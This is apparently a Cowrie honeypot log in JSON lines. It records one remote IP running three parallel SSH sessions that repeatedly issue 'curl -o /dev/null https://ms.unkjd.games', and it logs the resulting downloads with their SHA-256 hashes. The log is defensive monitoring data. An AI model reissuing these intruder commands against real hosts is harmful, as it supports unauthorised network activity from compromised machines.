{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.357943Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.359724Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.360661Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.409801Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.410487Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.413155Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.413900Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.415255Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.415993Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.422437Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.425622Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.452173Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.452858Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.458483Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.459526Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.460221Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.462370Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.463744Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.467838Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.470406Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.496392Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.497200Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.500884Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.504014Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.504598Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.505719Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.506306Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.509794Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.513058Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.536866Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.538897Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.539732Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.544706Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.547735Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.551162Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.551729Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.553655Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.554461Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.557931Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.580631Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.581343Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.587461Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.589163Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.591457Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.594425Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.595111Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.596814Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.599248Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.626621Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.628330Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.630535Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.631180Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.638225Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.639191Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.639773Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.641271Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.641909Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.669024Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.669680Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.674476Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.676495Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.678989Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.681521Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.682256Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.683989Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.684863Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.714592Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.715829Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.716454Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.721351Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.724825Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.726906Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.727904Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.728526Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.729902Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.730366Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.777688Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.778371Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.779858Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.780547Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.783420Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
